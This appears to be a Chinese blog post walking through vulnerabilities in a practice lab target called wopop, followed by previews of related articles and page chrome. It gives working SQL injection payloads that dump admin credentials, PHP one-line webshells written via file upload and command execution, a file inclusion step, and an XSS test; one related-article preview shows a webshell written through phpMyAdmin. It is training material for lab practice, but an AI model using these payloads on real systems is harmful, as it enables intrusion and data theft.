wopop靶场漏洞挖掘练习

已于 2024-09-13 17:37:30 修改
阅读量442 收藏 4
点赞数 3
文章标签: sql xss
于 2024-09-13 14:57:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80402555/article/details/142209574
版权

1、SQL注入漏洞

1、在搜索框输入-1 union select 1,2,3#

2、输入-1 union select 1,2,database()# ,可以得出数据库名

3、输入-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#,可以得出数据库中的表名

4、输入-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#,可以得出表中的列

5、输入-1 union select 1,2,group_concat(user_name,user_pass) from admin#,可以得出admin表中的数据

6、使用查询的账号密码即可登陆后台

2、文件上传漏洞

1、登陆后台后最底部可以上传文件

2、编辑一个内容为一句话木马的PHP文件

3、上传PHP文件,得出文件上传地址

4、访问上传的PHP文件,并使用蚁剑连接

3、命令执行漏洞

1、在页面最下方有一个命令执行框

2、输入系统命令会执行,输入whoami

3、尝试写入一句话木马 echo '<?php @eval($_POST[cmd]);?>' > 7.php

4、访问7.php

5、页面没有出错,使用蚁剑连接

4、文件包含漏洞

1、在“关于”界面中可以看到本页面是直接采用本地包含,尝试看看能否包含其他文件

2、在file后添加sxy1.php,并访问该文件

5、XSS漏洞

1、在登陆界面的username处输入<script>alert(1)</script>,点击登录,会出现弹窗

L黎蕊
关注
wordpress(awd复现)
qq_48511129的博客
01-19 3827
漏洞一:phpmyadmin数据库getshell 在网站源码位置发现phpmyadmin文件夹,进行文件访问 弱口令root,root进入mysql后台(也可以在数据库配置文件中查看) phpmyadmin后台执行sql语句 select “<?php eval($_POST[cjm]);” into outfile “/app/cjm.php”; 成功getshell 漏洞二:phpmyadmin后台文件包含 登入phpmyadmin的后台 http://114.67.175.224:10477.
PHP路由浅析
ddz777751的博客
06-05 101
1. php QQ GROUP 6848027 4915800 什么是php的路由机制 1、路由机制就是把某一个特定形式的URL结构中提炼出来系统对应的参数。举个例子,如:http://main.wopop.com/article/1 其中:/article/1 -> ?_m=article&id=1。 2、然后将拥有对应参数的URL转换成特定形式...
PHP的路由浅析
u012253351的博客
02-20 504
1.什么是php的路由机制 1、路由机制就是把某一个特定形式的URL结构中提炼出来系统对应的参数。举个例子,如:http://main.wopop.com/article/1  其中:/article/1  -> ?_m=article&id=1。  2、然后将拥有对应参数的URL转换成特定形式的URL结构,是上面的过程的逆向过程。 2.PHP的URL路由方式  总体来说就是:获取路径信息
2013腾讯web前端实习生一面总结
04-23 3897
1、@:屏蔽错误信息。 2、php错误类型 error_reporting() 设置 PHP 的报错级别并返回当前级别。 //禁用错误报告 error_reporting(0); E_ALL - 所有的错误和警告   E_ERROR - 致命性运行时错   E_WARNING - 运行时警告(非致命性错)   E_PARSE - 编译时解析错误   E_NOTICE -
蓝色大气的登录模板
07-03
而"Wopop_files"很可能是一个文件夹,里面包含了与"Wopop.html"相关的所有资源,如CSS样式文件、JavaScript脚本、图片和其他辅助文件。 综上所述,这个"蓝色大气的登录模板"涵盖了前端开发的基础知识,包括HTML结构...
HTML登陆页面案例收藏.zip
02-02
Bootstrap后台登录界面模板.zip Bootstrap响应式登录界面模板.zip Bootstrap响应式开场动画登录界面模板.zip ...Wopop简洁后台登录界面模板 .zip 粉红色简单用户登录界面模板 .zip ............等等
漂亮的login登陆页面html模板
12-04
`Wopop_files`可能是一个包含额外资源的目录,比如CSS文件(用于样式控制)、JavaScript文件(用于交互功能,如表单验证、按钮点击效果等)或者图像文件(如背景图片、图标等)。这些文件通常与`index.html`配合工作...
轮播台的简单代码
12-31
- "mbts_30_Wopop":这可能是轮播台代码的主文件,或者是一个包含相关资源(如CSS样式表、JavaScript脚本)的文件夹。在解压后,需要检查其内容并将其引入到HTML文件中,以便与自定义的图片资源一起运行轮播台。 在...
bootstrap前端开发框架开发利器所得到的多订单的
03-19
这个压缩包“mbts_30_Wopop”很可能包含了完整的Bootstrap库,包括CSS、JavaScript文件以及可能的自定义主题和组件,为快速开发多订单管理界面提供了便利。 Bootstrap的核心特性包括一个灵活的网格系统,允许开发者...
NoSQL之 Redis配置与优化
2201_75549363的博客
09-10 1405
Redis(远程字典服务器) 是一个开源的、使用 C 语言编写的 NoSQL 数据库。Redis 基于内存运行并支持持久化,采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 450
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 450
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
SQL 代表什么?SQL 的全称是什么?
程序员学习园地。
09-09 1657
创建表修改表删除表。
被低估的SQL
weixin_61431494的博客
09-03 1862
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
PL/SQL 继承Oracle Database 的可靠性、安全性和可移植性
纸上得来终觉浅,绝知此事要躬行
09-08 1054
PL/SQL 是一种旨在对 SQL 进行扩展的过程语言,其语法涵盖了 SQL 语句。PL/SQL 程序单元由 Oracle 数据库服务器编译并存储在数据库中。在运行时,PL/SQLSQL 都在同一服务器进程中运行,从而带来出色的效率。PL/SQL 自动继承了 Oracle 数据库的可靠性、安全性和可移植性。
HTB-Archetype(winPEAS枚举工具,mssql xp_cmdshell)
weixin_58038441的博客
09-10 1277
我们介绍了impacket中用于sql server连接工具 mssqlcilent,以及winPEAS枚举权限提升工具,以及powershell中下载文件,nc转移管理权,mssql 命令函数 xp_cmdshell 及开放命令。
SQL server 日常运维命令
2301_76664379的博客
09-10 1618
【代码】SQL server 日常运维命令。
larave5.8记录运行时产生的所有sql
从头再来-阿彪的博客
09-10 269
记录运行时产生的所有sql记录,包括select和update等。适用于无法定位到执行的代码段,通过sql反向查找。
【PostgreSQL里vacuum但是无法回收死元组的原因】
最新发布
小怪兽的博客
09-13 382
PostgreSQL数据库里的vacuum/autvacuum在我们日长的使用中可能会遇到很多问题,例如vacuum被阻塞,vacuum时间长,vacuum成功执行后,仍旧无法回收死元组等等。,本文主要介绍PostgreSQL的vacuum成功执行后,仍旧无法回收死元组的几种原因。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值